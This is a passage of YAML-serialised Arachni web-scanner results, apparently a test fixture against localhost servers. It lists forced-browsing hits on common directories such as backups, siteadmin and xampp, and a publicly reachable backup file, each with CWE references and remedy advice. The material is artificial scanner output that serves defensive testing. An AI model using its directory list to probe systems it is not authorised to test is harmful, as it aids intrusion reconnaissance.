  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/www/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: www
    injected: www
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: www
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/www/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/errors/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: errors
    injected: errors
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: errors
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/errors/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/siteadmin/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "9"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: siteadmin
    injected: siteadmin
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: siteadmin
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/siteadmin/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/backups/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: backups
    injected: backups
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: backups
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/backups/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/testing/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: testing
    injected: testing
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: testing
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/testing/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/internal/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: internal
    injected: internal
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: internal
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/internal/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/~home/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: ~home
    injected: ~home
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: ~home
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/~home/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/home/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: home
    injected: home
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: home
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/home/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/~guest/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: ~guest
    injected: ~guest
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: ~guest
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/~guest/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/~nobody/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: ~nobody
    injected: ~nobody
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: ~nobody
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/~nobody/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/export/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: export
    injected: export
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: export
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/export/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/testweb/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: testweb
    injected: testweb
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: testweb
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/testweb/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/~log/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: ~log
    injected: ~log
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: ~log
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/~log/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/error_log/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "9"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: error_log
    injected: error_log
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: error_log
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/error_log/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/network/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: network
    injected: network
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: network
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/network/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/xamp/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: xamp
    injected: xamp
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: xamp
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/xamp/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/ccbill/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: ccbill
    injected: ccbill
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: ccbill
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/ccbill/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/xampp/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: xampp
    injected: xampp
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: xampp
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/xampp/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/lamp/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: lamp
    injected: lamp
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: lamp
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/lamp/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
  internal_modname: BackupFiles
  method: ""
  mod_name: BackupFiles
  name: A backup file exists on the server.
  references: 
    WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
  remedy_guidance: |-
    Do not keep alternative versions of files underneath the virtual web server root.
                        When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                        and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
  severity: Medium
  tags: 
  - path
  - backup
  - file
  - discovery
  url: http://localhost:9338/some_filename.php.old
  variations: 
  - !ruby/object:Arachni::Issue 
    description: |-
      The server response indicates that a file matching
          the name of a common naming scheme for file backups can be publicly accessible.
          A developer has probably forgotten to remove this file after testing.
          This can lead to source code disclosure and privileged information leaks.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "21"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: some_filename.php.old
    injected: some_filename.php.old
    internal_modname: BackupFiles
    method: ""
    mod_name: BackupFiles
    name: A backup file exists on the server.
    opts: 
      :regexp: ""
    references: 
      WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
    remedy_guidance: |-
      Do not keep alternative versions of files underneath the virtual web server root.
                          When updating the site, delete or move the files to a directory outside the virtual root, edit them there,
                          and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root.
    response: some_filename.php.old
    severity: Medium
    tags: 
    - path
    - backup
    - file
    - discovery
    url: http://localhost:9338/some_filename.php.old
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: |-
    The server response indicates that a file matching
        the name of a common naming scheme for file backups can be publicly accessible.
        A developer has probably forgotten to remove this file after testing.
        This can lead to source code disclosure and privileged information leaks.
  elem: path
